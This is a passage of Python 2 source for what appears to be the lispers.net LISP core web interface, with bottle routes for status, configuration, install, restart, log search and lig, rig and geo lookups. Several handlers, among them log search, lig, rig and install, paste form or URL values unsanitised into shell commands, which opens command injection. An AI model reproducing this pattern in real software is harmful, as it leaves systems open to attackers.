output = output[0:-4]
#endif
if (clean):
output = "No Tracebacks found - a stable system is a happy system"
#endif
output = lisp.lisp_print_cour(output)
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_core_not_supported
#
# Print to browser landing page.
#
@bottle.route('/lisp/show/not-supported')
def lisp_core_not_supported():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_not_supported())
#enddef
#
# lisp_show_status_command
#
# Show some version and system info.
#
@bottle.route('/lisp/show/status')
def lisp_show_status_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
#
# Do not print out "show configuration" button or the debug drop-down menu.
#
output = ""
superuser = lispconfig.lisp_is_user_superuser(None)
if (superuser):
sc = lisp.lisp_button("show configuration", "/lisp/show/conf")
dc = lisp.lisp_button("show configuration diff", "/lisp/show/diff")
ac = lisp.lisp_button("archive configuration", "/lisp/archive/conf")
cc = lisp.lisp_button("clear configuration", "/lisp/clear/conf/verify")
lf = lisp.lisp_button("log flows", "/lisp/log/flows")
ils = lisp.lisp_button("install LISP software", "/lisp/install/image")
rs = lisp.lisp_button("restart LISP subsystem", "/lisp/restart/verify")
output = "<center>{}{}{}{}{}{}{}</center><hr>".format(sc, dc, ac, cc,
lf, ils, rs)
#endif
sys_uptime = commands.getoutput("uptime")
uname = commands.getoutput("uname -pv")
main_version = lisp.lisp_version.replace("+", "")
#
# This is really broken. It returns twice as many CPUs than really on the
# machine (on MacOS).
#
cpu_count = multiprocessing.cpu_count()
i = sys_uptime.find(", load")
sys_uptime = sys_uptime[0:i]
elapsed = lisp.lisp_print_elapsed(lisp.lisp_uptime)
top = "Not available"
#
# Get LISP process status.
#
command = "ps auww" if lisp.lisp_is_macos() else "ps aux"
status = commands.getoutput( \
"{} | egrep 'PID|python lisp|python -O lisp' | egrep -v grep". \
format(command))
status = status.replace(" ", lisp.space(1))
status = status.replace("\n", "<br>")
#
# top on MacOS.
#
if (uname.find("Darwin") != -1):
cpu_count = cpu_count / 2
top = commands.getoutput("top -l 1 | head -50")
top = top.split("PID")
top = top[0]
#
# Massage the 'top' output so we can have one line per information
# line.
#
i = top.find("Load Avg")
j = top[0:i].find("threads")
processes = top[0:j+7]
top = processes + "<br>" + top[i::]
i = top.find("CPU usage")
top = top[0:i] + "<br>" + top[i::]
i = top.find("SharedLibs:")
top = top[0:i] + "<br>" + top[i::]
i = top.find("MemRegions")
top = top[0:i] + "<br>" + top[i::]
i = top.find("PhysMem")
top = top[0:i] + "<br>" + top[i::]
i = top.find("VM:")
top = top[0:i] + "<br>" + top[i::]
i = top.find("Networks")
top = top[0:i] + "<br>" + top[i::]
i = top.find("Disks")
top = top[0:i] + "<br>" + top[i::]
else:
#
# top on Fedora Linux.
#
lines = commands.getoutput("top -b -n 1 | head -50")
lines = lines.split("PID")
lines[1] = lines[1].replace(" ", lisp.space(1))
lines = lines[0] + lines[1]
top = lines.replace("\n", "<br>")
#endif
release_notes = commands.getoutput("cat release-notes.txt")
release_notes = release_notes.replace("\n", "<br>")
output += '''
<br><table align="center" border="1" cellspacing="3x" cellpadding="5x">
<tr>
<td width="20%"><i>LISP Subsystem Version:<br>
LISP Release {} Build Date:</i></td>
<td width="80%"><font face="Courier New">{}<br>
{}</font></td>
</tr>
<tr>
<td width="20%"><i>LISP Subsystem Uptime:<br>System Uptime:</i></td>
<td width="80%"><font face="Courier New">{}<br>
{}</font></td>
</tr>
<tr>
<td width="20%"><i>System Architecture:<br>
Number of CPUs:<font face="Courier New">{}{}</font></td>
<td width="80%"><font face="Courier New">{}</font></td>
</tr>
<tr>
<td width="20%" valign="top"><i>LISP Process Status:</i></td>
<td width="80%">
<div style="height: 100px; overflow: auto">
<font size="2" face="Courier New">{}</font></div></td>
</tr>
<tr>
<td width="20%" valign="top"><i>System Resource Utilization:</i></td>
<td width="80%">
<div style="height: 200px; overflow: auto">
<font face="Courier New">{}</font></td>
</tr>
<tr>
<td width="20%" valign="top"><i>Release Notes:</i></td>
<td width="80%">
<div style="height: 300px; overflow: auto">
<font size="2" face="Courier New">{}</font></div></td>
</tr>
</table>
'''.format(main_version, lisp.lisp_version, lisp_build_date, elapsed,
sys_uptime, lisp.lisp_space(1), cpu_count, uname, status, top,
release_notes)
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_show_conf_command
#
# Show configuration file.
#
@bottle.route('/lisp/show/conf')
def lisp_show_conf_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(bottle.static_file("lisp.config", root="./", mimetype="text/plain"))
#enddef
#
# lisp_show_diff_command
#
# Show configuration diff file.
#
@bottle.route('/lisp/show/diff')
def lisp_show_diff_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(bottle.static_file("lisp.config.diff", root="./",
mimetype="text/plain"))
#enddef
#
# lisp_archive_conf_command
#
# Save a copy of lisp.config in lisp.config.archive.
#
@bottle.route('/lisp/archive/conf')
def lisp_archive_conf_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
lisp.lisp_ipc_lock.acquire()
os.system("cp ./lisp.config ./lisp.config.archive")
lisp.lisp_ipc_lock.release()
output = "Configuration file saved to "
output = lisp.lisp_print_sans(output)
output += lisp.lisp_print_cour("./lisp.config.archive")
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_clear_conf_command
#
# Clear contents of the lisp.config file.
#
@bottle.route('/lisp/clear/conf')
def lisp_clear_conf_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
os.system("cp ./lisp.config ./lisp.config.before-clear")
lisp.lisp_ipc_lock.acquire()
lisp_core_cp_lisp_config()
lisp.lisp_ipc_lock.release()
output = "Configuration cleared, a backup copy is stored in "
output = lisp.lisp_print_sans(output)
output += lisp.lisp_print_cour("./lisp.config.before-clear")
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_clear_conf_verify_command
#
# Ask user if they really want to clear the config file.
#
@bottle.route('/lisp/clear/conf/verify')
def lisp_clear_conf_verify_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
output = "<br>Are you sure you want to clear the configuration?"
output = lisp.lisp_print_sans(output)
yes = lisp.lisp_button("yes", "/lisp/clear/conf")
cancel = lisp.lisp_button("cancel", "/lisp")
output += yes + cancel + "<br>"
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_get_port_on_command_line
#
# Figure out if the lisp-core.pyo process was started with a parameter. If so,
# it is the port number we use for bottle. We want to restart using the same
# parameters.
#
def lisp_get_port_on_command_line():
port = ""
for p in ["443", "-8080", "8080"]:
c = 'ps auxww | egrep "lisp-core.pyo {}" | egrep -v grep'.format(p)
output = commands.getoutput(c)
if (output == ""): continue
output = output.split("\n")[0]
output = output.split(" ")
if (output[-2] == "lisp-core.pyo" and output[-1] == p): port = p
break
#endfor
return(port)
#enddef
#
# lisp_restart_command
#
# Restart the LISP subsystem.
#
@bottle.route('/lisp/restart')
def lisp_restart_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
#
# Check to see if requiretty is in effect. If so, we can't sudo, so tell
# user.
#
line = commands.getoutput("egrep requiretty /etc/sudoers").split(" ")
if (line[-1] == "requiretty" and line[0] == "Defaults"):
output = "Need to remove 'requiretty' from /etc/sudoers"
output = lisp.lisp_print_sans(output)
return(lispconfig.lisp_show_wrapper(output))
#endif
lisp.lprint(lisp.bold("LISP subsystem restart request received", False))
#
# Check if we should start the process with 443 (or -8080) as the port
# number for the lisp-core should run on.
#
port = lisp_get_port_on_command_line()
#
# Build command and launch it in another process.
#
c = "sleep 1; sudo ./RESTART-LISP {}".format(port)
thread.start_new_thread(os.system, (c, ))
output = lisp.lisp_print_sans("Restarting LISP subsystem ...")
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_restart_verify_command
#
# Ask user if they really want to restart the LISP subsystem.
#
@bottle.route('/lisp/restart/verify')
def lisp_restart_verify_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
output = "<br>Are you sure you want to restart the LISP subsystem?"
output = lisp.lisp_print_sans(output)
yes = lisp.lisp_button("yes", "/lisp/restart")
cancel = lisp.lisp_button("cancel", "/lisp")
output += yes + cancel + "<br>"
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_install_command
#
# Install tgz file user supplied in html form.
#
@bottle.route('/lisp/install', method="post")
def lisp_install_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
image = bottle.request.forms.get("image_url")
if (image.find("lispers.net") == -1 or image.find(".tgz") == -1):
string = "Invalid install request for file {}".format(image)
lisp.lprint(lisp.bold(string, False))
output = lisp.lisp_print_sans("Invalid lispers.net tarball file name")
return(lispconfig.lisp_show_wrapper(output))
#endif
if (lisp.lisp_is_ubuntu()):
c = "python lisp-get-bits.pyo {} force 2>&1 > /dev/null".format(image)
else:
c = "python lisp-get-bits.pyo {} force >& /dev/null".format(image)
#endif
status = os.system(c)
image_file = image.split("/")[-1]
if (os.path.exists(image_file)):
release = image.split("release-")[1]
release = release.split(".tgz")[0]
output = "Install completed for release {}".format(release)
output = lisp.lisp_print_sans(output)
output += "<br><br>" + lisp.lisp_button("restart LISP subsystem",
"/lisp/restart/verify") + "<br>"
else:
string = lisp.lisp_print_cour(image)
output = "Install failed for file {}".format(string)
output = lisp.lisp_print_sans(output)
#endif
string = "Install request for file {} {}".format(image,
"succeeded" if (status == 0) else "failed")
lisp.lprint(lisp.bold(string, False))
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_install_get_image
#
# Ask user for tgz image to install.
#
@bottle.route('/lisp/install/image')
def lisp_install_get_image():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
string = lisp.lisp_print_sans("<br>Enter lispers.net tarball URL:")
output = '''
<form action="/lisp/install" method="post" style="display: inline;">
{}
<input type="text" name="image_url" size="75" required/>
<input type="submit" style="background-color:transparent;border-radius:10px;" value="Submit" />
</form><br>'''.format(string)
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_log_flows_command
#
# Touch file ./log-flows so we can have the user request a dump of the memory
# based flow log.
#
@bottle.route('/lisp/log/flows')
def lisp_log_flows_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
os.system("touch ./log-flows")
output = lisp.lisp_print_sans("Flow data appended to file ")
out = "<a href='/lisp/show/log/lisp-flow/100'>logs/lisp-flows.log</a>"
output += lisp.lisp_print_cour(out)
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_search_log_command
#
# Search the <num> tail lines of <name> and display in <hr> separated format
# with search keyword in red.
#
@bottle.route('/lisp/search/log/<name>/<num>/<keyword>')
def lisp_search_log_command(name = "", num = "", keyword = ""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
command = "tail -n {} logs/{}.log | egrep -B10 -A10 {}".format(num, name,
keyword)
output = commands.getoutput(command)
if (output):
occurences = output.count(keyword)
output = lisp.convert_font(output)
output = output.replace("--\n--\n", "--\n")
output = output.replace("\n", "<br>")
output = output.replace("--<br>", "<hr>")
output = "Found <b>{}</b> occurences<hr>".format(occurences) + output
else:
output = "Keyword {} not found".format(keyword)
#endif
#
# Highlight keyword in blue.
#
blue = "<font color='blue'><b>{}</b>".format(keyword)
output = output.replace(keyword, blue)
output = output.replace(keyword, keyword + "</font>")
output = lisp.lisp_print_cour(output)
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_search_log_command_input
#
# Get input form data for keyword to search on.
#
@bottle.post('/lisp/search/log/<name>/<num>')
def lisp_search_log_command_input(name = "", num=""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
keyword = bottle.request.forms.get("keyword")
return(lisp_search_log_command(name, num, keyword))
#enddef
#
# lisp_show_log_name_command
#
# Show trace log file.
#
@bottle.route('/lisp/show/log/<name>/<num>')
def lisp_show_log_name_command(name = "", num=""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
#
# Deafult to print out last 100 lines and convert to html bold.
#
if (num == ""): num = 100
header = '''
<form action="/lisp/search/log/{}/{}" method="post">
<i>Keyword search:</i>
<input type="text" name="keyword" />
<input style="background-color:transparent;border-radius:10px;" type="submit" value="Submit" />
</form><hr>
'''.format(name, num)
if (os.path.exists("logs/{}.log".format(name))):
output = commands.getoutput("tail -n {} logs/{}.log".format(num, name))
output = lisp.convert_font(output)
output = output.replace("\n", "<br>")
output = header + lisp.lisp_print_cour(output)
else:
a = lisp.lisp_print_sans("File")
aa = lisp.lisp_print_cour("logs/{}.log".format(name))
aaa = lisp.lisp_print_sans("does not exist")
output = "{} {} {}".format(a, aa, aaa)
#endif
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_debug_menu_command
#
# Turn on or off debug.
#
@bottle.route('/lisp/debug/<name>')
def lisp_debug_menu_command(name = ""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
#
# Process "disable all" separately.
#
if (name == "disable%all"):
data = lispconfig.lisp_get_clause_for_api("lisp debug")
if (data[0].has_key("lisp debug")):
new = []
for entry in data[0]["lisp debug"]:
key = entry.keys()[0]
new.append({ key : "no" })
#endfor
new = { "lisp debug" : new }
lispconfig.lisp_put_clause_for_api(new)
#endif
data = lispconfig.lisp_get_clause_for_api("lisp xtr-parameters")
if (data[0].has_key("lisp xtr-parameters")):
new = []
for entry in data[0]["lisp xtr-parameters"]:
key = entry.keys()[0]
if (key in ["data-plane-logging", "flow-logging"]):
new.append({ key : "no" })
else:
new.append({ key : entry[key] })
#endif
#endfor
new = { "lisp xtr-parameters" : new }
lispconfig.lisp_put_clause_for_api(new)
#endif
return(lispconfig.lisp_landing_page())
#endif
#
# Process enabling or disable debug logging for a single item.
#
name = name.split("%")
component = name[0]
yesno = name[1]
xtr_parms = ["data-plane-logging", "flow-logging"]
clause_name = "lisp xtr-parameters" if (component in xtr_parms) else \
"lisp debug"
data = lispconfig.lisp_get_clause_for_api(clause_name)
if (data[0].has_key(clause_name)):
new = {}
for entry in data[0][clause_name]:
new[entry.keys()[0]] = entry.values()[0]
if (new.has_key(component)): new[component] = yesno
#endfor
new = { clause_name: new }
lispconfig.lisp_put_clause_for_api(new)
#endif
return(lispconfig.lisp_landing_page())
#enddef
#
# lisp_clear_referral_command
#
# Send a clear command to a LISP component.
#
@bottle.route('/lisp/clear/<name>')
@bottle.route('/lisp/clear/etr/<etr_name>/<stats_name>')
@bottle.route('/lisp/clear/rtr/<rtr_name>/<stats_name>')
@bottle.route('/lisp/clear/itr/<itr_name>')
@bottle.route('/lisp/clear/rtr/<rtr_name>')
def lisp_clear_command(name = "", itr_name = '', rtr_name = "", etr_name = "",
stats_name = ""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
#
# Do various checks.
#
if (lispconfig.lisp_is_user_superuser(None) == False):
output = lisp.lisp_print_sans("Not authorized")
return(lispconfig.lisp_show_wrapper(output))
#endif
ipc = "clear"
if (name == "referral"):
process = "lisp-mr"
print_name = "Referral"
elif (itr_name == "map-cache"):
process = "lisp-itr"
print_name = "ITR <a href='/lisp/show/itr/map-cache'>map-cache</a>"
elif (rtr_name == "map-cache"):
process = "lisp-rtr"
print_name = "RTR <a href='/lisp/show/rtr/map-cache'>map-cache</a>"
elif (etr_name == "stats"):
process = "lisp-etr"
print_name = ("ETR '{}' decapsulation <a href='/lisp/show/" + \
"database'>stats</a>").format(stats_name)
ipc += "%" + stats_name
elif (rtr_name == "stats"):
process = "lisp-rtr"
print_name = ("RTR '{}' decapsulation <a href='/lisp/show/" + \
"rtr/map-cache'>stats</a>").format(stats_name)
ipc += "%" + stats_name
else:
output = lisp.lisp_print_sans("Invalid command")
return(lispconfig.lisp_show_wrapper(output))
#endif
#
# Send IPC to lisp-mr. Do not wait for a reply.
#
ipc = lisp.lisp_command_ipc(ipc, "lisp-core")
lisp.lisp_ipc(ipc, lisp_ipc_socket, process)
#
# Only touch lisp.config file if there are static map-cache entries.
#
exist = commands.getoutput("egrep 'lisp map-cache' ./lisp.config")
if (exist != ""):
os.system("touch ./lisp.config")
#endif
output = lisp.lisp_print_sans("{} cleared".format(print_name))
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_show_map_server_command
#
# Have the lisp-etr process show the map-server configuration.
#
@bottle.route('/lisp/show/map-server')
def lisp_show_map_server_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show map-server"))
#enddef
#
# lisp_show_database_command
#
# Have the lisp-etr process show the database-mapping configuration.
#
@bottle.route('/lisp/show/database')
def lisp_show_database_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show database-mapping"))
#enddef
#
# lisp_show_itr_map_cache_command
#
# Have the lisp-itr process show the map-cache.
#
@bottle.route('/lisp/show/itr/map-cache')
def lisp_show_itr_map_cache_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show itr-map-cache"))
#enddef
#
# lisp_show_itr_rloc_probing_command
#
# Have the lisp-itr process show the RLOC-probe list.
#
@bottle.route('/lisp/show/itr/rloc-probing')
def lisp_show_itr_rloc_probing_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show itr-rloc-probing"))
#enddef
#
# lisp_show_itr_map_cache_lookup
#
# Execute longest match lookup and return results.
#
@bottle.post('/lisp/show/itr/map-cache/lookup')
def lisp_show_itr_map_cache_lookup():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid_str = bottle.request.forms.get("eid")
if (lispconfig.lisp_validate_input_address_string(eid_str) == False):
output = "Address '{}' has invalid format".format(eid_str)
output = lisp.lisp_print_sans(output)
return(lispconfig.lisp_show_wrapper(output))
#endif
command = "show itr-map-cache" + "%" + eid_str
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
command))
#enddef
#
# lisp_show_rtr_map_cache_command
#
# Have the lisp-rtr process show the map-cache.
#
@bottle.route('/lisp/show/rtr/map-cache')
@bottle.route('/lisp/show/rtr/map-cache/<dns>')
def lisp_show_rtr_map_cache_command(dns = ""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
if (dns == "dns"):
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show rtr-map-cache-dns"))
else:
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show rtr-map-cache"))
#endif
#enddef
#
# lisp_show_rtr_rloc_probing_command
#
# Have the lisp-rtr process show the RLOC-probe list.
#
@bottle.route('/lisp/show/rtr/rloc-probing')
def lisp_show_rtr_rloc_probing_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show rtr-rloc-probing"))
#enddef
#
# lisp_show_rtr_map_cache_lookup
#
# Execute longest match lookup and return results.
#
@bottle.post('/lisp/show/rtr/map-cache/lookup')
def lisp_show_rtr_map_cache_lookup():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid_str = bottle.request.forms.get("eid")
if (lispconfig.lisp_validate_input_address_string(eid_str) == False):
output = "Address '{}' has invalid format".format(eid_str)
output = lisp.lisp_print_sans(output)
return(lispconfig.lisp_show_wrapper(output))
#endif
command = "show rtr-map-cache" + "%" + eid_str
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
command))
#enddef
#
# lisp_show_referral_command
#
# Have the lisp-mr show the DDT referral-cache.
#
@bottle.route('/lisp/show/referral')
def lisp_show_referral_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show referral-cache"))
#enddef
#
# lisp_show_referral_cache_lookup
#
# Execute longest match lookup and return results.
#
@bottle.post('/lisp/show/referral/lookup')
def lisp_show_referral_cache_lookup():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid_str = bottle.request.forms.get("eid")
if (lispconfig.lisp_validate_input_address_string(eid_str) == False):
output = "Address '{}' has invalid format".format(eid_str)
output = lisp.lisp_print_sans(output)
return(lispconfig.lisp_show_wrapper(output))
#endif
command = "show referral-cache" + "%" + eid_str
return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_delegation_command
#
# Have the lisp-mr show the DDT configured delegation information.
#
@bottle.route('/lisp/show/delegations')
def lisp_show_delegations_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show delegations"))
#enddef
#
# lisp_show_delegations_lookup
#
# Execute longest match lookup and return results.
#
@bottle.post('/lisp/show/delegations/lookup')
def lisp_show_delegations_lookup():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid_str = bottle.request.forms.get("eid")
if (lispconfig.lisp_validate_input_address_string(eid_str) == False):
output = "Address '{}' has invalid format".format(eid_str)
output = lisp.lisp_print_sans(output)
return(lispconfig.lisp_show_wrapper(output))
#endif
command = "show delegations" + "%" + eid_str
return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_site_command
#
# Have the lisp-ms process show the site registration information. Convert
# eid-prefix from format "<iid>-<eid>-<ml>" to "[<iid>]<eid>/<ml>" internal
# format. We need to do this because URLs should avoid square brackets.
#
@bottle.route('/lisp/show/site')
@bottle.route('/lisp/show/site/<eid_prefix>')
def lisp_show_site_command(eid_prefix = ""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
command = "show site"
if (eid_prefix != ""):
command = lispconfig.lisp_parse_eid_in_url(command, eid_prefix)
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_itr_dyn_eid_command
#
# Show dynamic-EIDs from the ITR's point of view.
#
@bottle.route('/lisp/show/itr/dynamic-eid/<eid_prefix>')
def lisp_show_itr_dyn_eid_command(eid_prefix = ""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
command = "show itr-dynamic-eid"
if (eid_prefix != ""):
command = lispconfig.lisp_parse_eid_in_url(command, eid_prefix)
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_dyn_eid_command
#
# Show dynamic-EIDs from the ITR's point of view.
#
@bottle.route('/lisp/show/etr/dynamic-eid/<eid_prefix>')
def lisp_show_dyn_eid_command(eid_prefix = ""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
command = "show etr-dynamic-eid"
if (eid_prefix != ""):
command = lispconfig.lisp_parse_eid_in_url(command, eid_prefix)
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_site_lookup
#
# Execute longest match lookup and return results.
#
@bottle.post('/lisp/show/site/lookup')
def lisp_show_site_lookup():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid_str = bottle.request.forms.get("eid")
if (lispconfig.lisp_validate_input_address_string(eid_str) == False):
output = "Address '{}' has invalid format".format(eid_str)
output = lisp.lisp_print_sans(output)
return(lispconfig.lisp_show_wrapper(output))
#endif
command = "show site" + "%" + eid_str + "@lookup"
return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_lig_command
#
# Do interactive lig.
#
@bottle.post('/lisp/lig')
def lisp_lig_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid = bottle.request.forms.get("eid")
mr = bottle.request.forms.get("mr")
count = bottle.request.forms.get("count")
no_nat = "no-info" if bottle.request.forms.get("no-nat") == "yes" else ""
#
# Default map-resolver to localhost.
#
if (mr == ""): mr = "localhost"
#
# Check for no input. User error.
#
if (eid == ""):
output = "Need to supply EID address"
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#endif
lig = ""
if os.path.exists("lisp-lig.pyo"): lig = "-O lisp-lig.pyo"
if os.path.exists("lisp-lig.py"): lig = "lisp-lig.py"
#
# Something went wrong with the install.
#
if (lig == ""):
output = "Cannot find lisp-lig.py or lisp-lig.pyo"
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#endif
if (count != ""): count = "count {}".format(count)
command = 'python {} "{}" to {} {} {}'.format(lig, eid, mr, count, no_nat)
output = commands.getoutput(command)
output = output.replace("\n", "<br>")
output = lisp.convert_font(output)
rloc = lisp.space(2) + "RLOC:"
output = output.replace("RLOC:", rloc)
empty = lisp.space(2) + "Empty,"
output = output.replace("Empty,", empty)
geo = lisp.space(4) + "geo:"
output = output.replace("geo:", geo)
elp = lisp.space(4) + "elp:"
output = output.replace("elp:", elp)
rle = lisp.space(4) + "rle:"
output = output.replace("rle:", rle)
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#enddef
#
# lisp_rig_command
#
# Do interactive rig.
#
@bottle.post('/lisp/rig')
def lisp_rig_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid = bottle.request.forms.get("eid")
ddt = bottle.request.forms.get("ddt")
follow_all = "follow-all-referrals" if \
bottle.request.forms.get("follow") == "yes" else ""
#
# Default ddt-node to localhost.
#
if (ddt == ""): ddt = "localhost"
#
# Check for no input. User error.
#
if (eid == ""):
output = "Need to supply EID address"
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#endif
rig = ""
if os.path.exists("lisp-rig.pyo"): rig = "-O lisp-rig.pyo"
if os.path.exists("lisp-rig.py"): rig = "lisp-rig.py"
#
# Something went wrong with the install.
#
if (rig == ""):
output = "Cannot find lisp-rig.py or lisp-rig.pyo"
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#endif
command = 'python {} "{}" to {} {}'.format(rig, eid, ddt, follow_all)
output = commands.getoutput(command)
output = output.replace("\n", "<br>")
output = lisp.convert_font(output)
ref = lisp.space(2) + "Referrals:"
output = output.replace("Referrals:", ref)
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#enddef
#
# lisp_run_geo_lig
#
# Do lookup on both supplied EIDs passed as input parameters and return
# a geo-point and geo-prefix if they are found in RLOC records.
#
def lisp_run_geo_lig(eid1, eid2):
lig = None
if os.path.exists("lisp-lig.pyo"): lig = "-O lisp-lig.pyo"
if os.path.exists("lisp-lig.py"): lig = "lisp-lig.py"
if (lig == None): return([None, None])
#
# First get a map-resolver addresss.
#
o = commands.getoutput("egrep -A 2 'lisp map-resolver {' ./lisp.config")
mr = None
for keyword in ["address = ", "dns-name = "]:
mr = None
index = o.find(keyword)
if (index == -1): continue
mr = o[index+len(keyword)::]
index = mr.find("\n")
if (index == -1): continue
mr = mr[0:index]
break
#endfor
if (mr == None): return([None, None])
#
# Lookup EIDs in loop.
#
addr = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
geos = []
for eid in [eid1, eid2]:
#
# Don't do lookups for Geo-Coordinates. Only for EIDs that are not
# in Geo-Coordinate format.
#
if (addr.is_geo_string(eid)):
geos.append(eid)
continue
#endif
command = 'python {} "{}" to {} count 1'.format(lig, eid, mr)
for cmd in [command, command + " no-info"]:
output = commands.getoutput(command)
index = output.find("geo: ")
if (index == -1):
if (cmd != command): geos.append(None)
continue
#endif
output = output[index+len("geo: ")::]
index = output.find("\n")
if (index == -1):
if (cmd != command): geos.append(None)
continue
#endif
geos.append(output[0:index])
break
#endfor
#endfor
return(geos)
#enddef
#
# lisp_geo_command
#
# Do geo lookups from lisp.lisp_geo() functions.
#
@bottle.post('/lisp/geo')
def lisp_geo_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid = bottle.request.forms.get("geo-point")
eid_prefix = bottle.request.forms.get("geo-prefix")
output = ""
#
# If an EID in the form of an IP address or distinguish-name, run a
# lig to get record from mapping database to obtain the geo data.
#
gs = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
geo_point = lisp.lisp_geo("")
geo_prefix = lisp.lisp_geo("")
point, prefix = lisp_run_geo_lig(eid, eid_prefix)
#
# Check EID format if geo-coordiante or return geo-point from database
# lookup.
#
if (gs.is_geo_string(eid)):
if (geo_point.parse_geo_string(eid) == False):
output = "Could not parse geo-point format"
#endif
elif (point == None):
output = "EID {} lookup could not find geo-point".format(
lisp.bold(eid, True))
elif (geo_point.parse_geo_string(point) == False):
output = "Could not parse geo-point format returned from lookup"
#endif
#
# Geo-point is good, now check EID-prefix or geo-prefix format retunred
# from database lookup.
#
if (output == ""):
if (gs.is_geo_string(eid_prefix)):
if (geo_prefix.parse_geo_string(eid_prefix) == False):
output = "Could not parse geo-prefix format"
#endif
elif (prefix == None):
output = "EID-prefix {} lookup could not find geo-prefix".format( \
lisp.bold(eid_prefix, True))
elif (geo_prefix.parse_geo_string(prefix) == False):
output = "Could not parse geo-prefix format returned from lookup"
#endif
#endif
#
# No input errors. Return good results. Otherwise, error response in
# variable 'output'.
#
if (output == ""):
eid = "" if (eid == point) else ", EID {}".format(eid)
eid_prefix = "" if (eid_prefix == prefix) else \
", EID-prefix {}".format(eid_prefix)
point_str = geo_point.print_geo_url()
prefix_str = geo_prefix.print_geo_url()
km = geo_prefix.radius
dd_point = geo_point.dms_to_decimal()
dd_point = (round(dd_point[0], 6), round(dd_point[1], 6))
